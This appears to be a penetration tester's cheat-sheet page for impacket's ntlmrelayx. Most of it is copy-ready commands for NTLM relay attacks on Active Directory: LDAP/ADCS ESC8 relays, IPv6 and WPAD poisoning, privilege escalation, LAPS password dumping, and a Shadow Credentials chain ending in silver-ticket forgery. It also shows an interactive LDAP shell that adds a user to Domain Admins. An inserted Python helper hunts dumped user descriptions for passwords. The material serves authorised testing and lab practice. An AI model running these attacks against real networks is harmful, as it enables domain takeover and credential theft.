# ntlmrelayx.py
ntlmrelayx is part of [impacket](https://github.com/fortra/impacket).

## Install
I usually use the embedded version in exegol, but that doesn't always play nice, so I like to go:

```
python3 -m venv venv
source venv/bin/activate
python3 -m pipx install impacket
```

Then just run things directly, like:
```
ntlmrelayx
```

## Logging output
```
ntlmrelayx YOUR-COMMANDS --output-file output.log
```

### Add date/timestamp to logs
Add `-ts` somewhere in the command:

```
-ts
```

## Basic vanilla relay
You could, for example, poison network traffic and then relay to a DC to get a "dump" of domain data (where `lootme` is a folder to save dumped data):

```
ntlmrelayx -t ldap://ip.of.a.dc -smb2support -l lootme
```

!!!tip
From this dump you'll get a `domain_users.grep` file. If you want to make a quick CSV with just the AD username and Description fields (to see if any descriptions mention `password`, `pass`, `pwd`, etc.), you can do:

```
awk -F'\t' 'NR==1 {next} {printf "%s,%s\n", $3, $12}' domain_users.grep > domain_users.csv
```
!!!
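As an added example (not from this page or from impacket), here is a Python equivalent of the awk one-liner that also flags any description mentioning a password-like word. The column layout (field 3 = `sAMAccountName`, field 12 = `description`) is assumed from the awk command, and the sample rows are constructed, not real dump output.

```python
import csv
import io
import re

# Keywords the tip above suggests hunting for in the description field.
KEYWORDS = re.compile(r"\b(password|passwd|pass|pwd)\b", re.IGNORECASE)

# Header and field positions the awk one-liner assumes (field 3 =
# sAMAccountName, field 12 = description). Assumption for this example.
HEADER = ["cn", "name", "sAMAccountName", "memberOf", "primaryGroupId",
          "whenCreated", "whenChanged", "lastLogon", "userAccountControl",
          "pwdLastSet", "objectSid", "description"]

# Constructed sample rows in the tab-separated .grep layout, not real data.
SAMPLE_GREP = "\n".join("\t".join(r) for r in [
    HEADER,
    ["Alice Example", "Alice Example", "alice", "", "513", "2020-01-01",
     "2020-01-02", "0", "512", "0", "S-1-5-21-1-2-3-1105", "Helpdesk analyst"],
    ["svc_backup", "svc_backup", "svc_backup", "", "513", "2019-05-05",
     "2019-05-05", "0", "66048", "0", "S-1-5-21-1-2-3-1110", "Backup svc; pass: see vault"],
    ["Bob Example", "Bob Example", "bob", "", "513", "2021-03-03",
     "2021-03-03", "0", "512", "0", "S-1-5-21-1-2-3-1120", ""],
    ["legacy", "legacy", "legacy", "", "513", "2015-01-01",
     "2015-01-01", "0", "512", "0", "S-1-5-21-1-2-3-1130", "Legacy app. Initial Password set by IT"],
]) + "\n"


def parse_grep(text):
    """Parse the tab-separated .grep dump into dicts keyed by the header row."""
    rows = list(csv.reader(io.StringIO(text), delimiter="\t"))
    header, body = rows[0], rows[1:]
    return [dict(zip(header, r)) for r in body if r]


def to_user_csv(rows):
    """Same output as the awk one-liner: sAMAccountName,description per user."""
    buf = io.StringIO()
    writer = csv.writer(buf, lineterminator="\n")
    for r in rows:
        writer.writerow([r["sAMAccountName"], r["description"]])
    return buf.getvalue()


def flag_descriptions(rows):
    """Return (account, description) pairs whose description mentions a password-like word."""
    return [(r["sAMAccountName"], r["description"])
            for r in rows if KEYWORDS.search(r["description"])]


if __name__ == "__main__":
    for sam, desc in flag_descriptions(parse_grep(SAMPLE_GREP)):
        print(f"REVIEW {sam}: {desc}")
```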

## Relaying WPAD/Proxy-Auth connections
If you're using [Responder](/pentesting/internal/responder/) you can get DHCP poisoning going, and then set up ntlmrelayx to listen on port 3128 (thanks to [thehacker.recipes](https://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications/wpad-spoofing) for this tip):

```
ntlmrelayx -t ldaps://ip.of.a.dc -i --http-port 3128
```

## Relaying with ADCS ESC8 attack
```
ntlmrelayx -t http://ca.domain.com/certsrv/certfnsh.asp -smb2support --adcs -debug --template 'DomainController'
```

## Escalate computer privileges via relay with IPv6 poisoning
If you've already added a computer record to the environment (using something like [powermad](/pentesting/Internal/powermad)), you may be able to relay to LDAP and assign escalated privileges to that computer object! For example:

```
ntlmrelayx.py -t ldap://ip.of.domain.controller --delegate-access -smb2support --escalate-user COMPUTER-OBJECT-YOU-CONTROL$
```

Then, if you've found a system running [WebClient](/pentesting/Internal/webclientservicescanner), you could potentially [coerce](/pentesting/Internal/coercer) authentication to a [DNS record you've added](/pentesting/Internal/dnstool) and pull off the privesc!

## Escalate user account via relay with IPv6 poisoning
```
ntlmrelayx.py -6 -t ldap://ip.of.domain.controller --escalate-user low-priv -wh doesntexist.domain.com -debug
```

## Delegate access attack while poisoning with [mitm6](/pentesting/Internal/mitm6)
```
ntlmrelayx.py -6 -wh doesntexist.domain.com -t ldaps://ip.of.a.domain-controller --delegate-access
```

## Setup SOCKS relay to a list of hosts
In this example we have a `targets.txt` file full of entries like this:

```
smb://1.2.3.4
smb://1.2.3.5
smb://1.2.3.6
```

We setup the SOCKS relay like so:

```
ntlmrelayx.py -tf targets.txt -smb2support -socks
```

## Dumping LAPS passwords
If you just want to set up a relay to dump the LAPS passwords (if you're lucky enough to relay a DA cred), you can skip the dumping of domain info and/or adding a DA account and just specify that you want to dump LAPS passwords:
```
ntlmrelayx.py -6 -wh doesntexist -t ldap://ip.of.a.domain-controller --no-da --no-dump --dump-laps
```

## Shadow Credentials attack
My favorite write-up on this attack is probably [this one from GuidePoint Security](https://www.guidepointsecurity.com/blog/beyond-the-basics-exploring-uncommon-ntlm-relay-attack-techniques/).

### Find hosts with WebClient running
The [webclientservicescanner](/pentesting/Internal/webclientservicescanner) works well for this.

### Add a rogue DNS record pointing to your machine
Try [dnstool.py](/pentesting/Internal/dnstool) for this.

### Setup relay for the Shadow Credentials attack
```
ntlmrelayx.py -t ldap://ip.of.a.dc --shadow-credentials --shadow-target 'VICTIM$' --no-validate-privs --no-dump --no-da
```
### Trigger HTTP auth from VICTIM$
Head to our [coercer](/pentesting/Internal/coercer) page for more info.

### Use the PFX to get a TGT
```
gettgtpkinit.py -cert-pfx cert.pfx -pfx-pass WHATEVER-PASS-IS domain.com/VICTIM$ cert.ccache
export KRB5CCNAME=cert.ccache
```

This will spit out a bunch of information including the encryption key, which you can then use to extract the NT hash of the machine:
```
getnthash.py -dc-ip IP.OF.A.DC -key XXXENCRYPTION KEY GOES HEREXXX
```

With the NT hash, you can forge a silver ticket. First get the SID of the domain. Below is one way to get it: query the Administrator account's `objectSid`, which is the domain SID with that account's RID appended. Just be sure that in the `ticketer.py` command that follows you remove the RID (the last part of the SID):
```
pywerview.py get-adobject -d domain.com -u lowpriv -p 'password' -t IP.OF.A.DOMAINCONTROLLER --sam-account-name administrator --attributes objectsid
```

Forge the ticket!
```
ticketer.py -domain domain.com -domain-sid xxxBE SURE TO LEAVE OFF THE RID!!!xxx -nthash yyy -spn cifs/VICTIMSYSTEM.domain.com administrator
```

## Shadow Credentials attack (with LDAP shell)
I followed [these instructions to pwn the HTB: Mist machine](https://0xdf.gitlab.io/2024/10/26/htb-mist.html) for this.

### Get a venv setup
```
python3 -m venv venv
source venv/bin/activate
```

### Install the appropriate impacket fork
```
git clone -b interactive-ldap-shadow-creds https://github.com/Tw1sm/impacket.git
cd impacket
pip install --upgrade pip
pip install .
pip install setuptools
```

### Run ntlmrelayx with sudo permissions
```
sudo ~/venv/bin/python3 impacket/examples/ntlmrelayx.py -smb2support -t ldap://ip.of.a.dc -i
```

### Interact with the relay
```
nc 127.0.0.1 11000
```

Commands you can use ([this article](https://www.secureideas.com/blog/you-dont-need-pkinit-to-win-it) was helpful):

```
add_computer [computer] [password]
rename_computer [current_name] [new_name]
add_user [new_user]
add_user_to_group [user] [group]
change_password [user] [password]
clear_rbcd [target]
disable_account [user]
enable_account [user]
dump
search [query] [attributes]
get_user_groups [user]
get_group_users [group]
get_laps_password [computer]
grant_control [target] [grantee]
set_dontreqpreauth [user] [true/false]
set_rbcd [target] [grantee]
start_tls
write_gpo_dacl [user] [gpoSID]
whoami
dirsync
exit
```

For example, if you want to add a new user and then make them a DA:

```
add_user yermom
add_user_to_group yermom 'Domain Admins'
# Or just regular ol' Administrators
# add_user_to_group yermom Administrators
```

Or, if you want to grant control using `set_rbcd` (the syntax is `set_rbcd Target Controlled-Account`):

```
set_rbcd WORKSTATION01$ ADDED-MACHINE-PER-MAQ-SETTING$
```

### Relay to MSSQL with interactive shell
```
ntlmrelayx -t mssql://192.168.7.7 -i -ts -smb2support
```
